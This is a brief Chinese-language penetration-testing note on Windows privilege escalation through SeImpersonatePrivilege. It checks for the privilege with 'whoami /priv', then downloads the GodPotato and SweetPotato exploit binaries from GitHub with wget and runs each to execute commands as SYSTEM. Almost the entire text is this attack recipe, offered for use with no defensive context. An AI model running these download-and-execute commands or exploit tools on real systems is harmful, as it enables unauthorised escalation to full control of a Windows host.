SeImpersonatePrivilege

1. 利用

whoami /priv #检测

可以使用 GodPotato 或者 SweetPotato 进行提权

#GodPotato 
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
GodPotato -cmd "cmd /c whoami"

#SweetPotato
wget https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe
SweetPotato.exe -a whoami